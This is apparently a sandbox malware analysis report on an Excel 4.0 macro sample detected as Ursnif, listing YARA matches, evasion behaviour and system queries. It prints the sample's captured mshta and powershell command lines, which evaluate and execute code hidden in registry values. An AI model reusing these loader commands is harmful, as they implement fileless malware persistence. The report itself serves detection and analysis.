Source: Yara match File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3155
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2839
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2541
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2100
Found dropped PE file which has not been started or loaded
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644 Thread sleep count: 32 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644 Thread sleep count: 49 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644 Thread sleep count: 41 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644 Thread sleep count: 38 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156 Thread sleep time: -1667865539s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156 Thread sleep count: 62 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156 Thread sleep count: 45 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156 Thread sleep count: 88 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752 Thread sleep count: 84 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752 Thread sleep count: 56 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752 Thread sleep count: 39 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4724 Thread sleep count: 2541 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 68 Thread sleep count: 2100 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation

Anti Debugging:

Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp Binary or memory string: Progman
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E4454 cpuid 3_2_001E4454
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E6B0F HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process, 3_2_001E6B0F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E4454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_001E4454
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E4C1B CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 3_2_001E4C1B
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY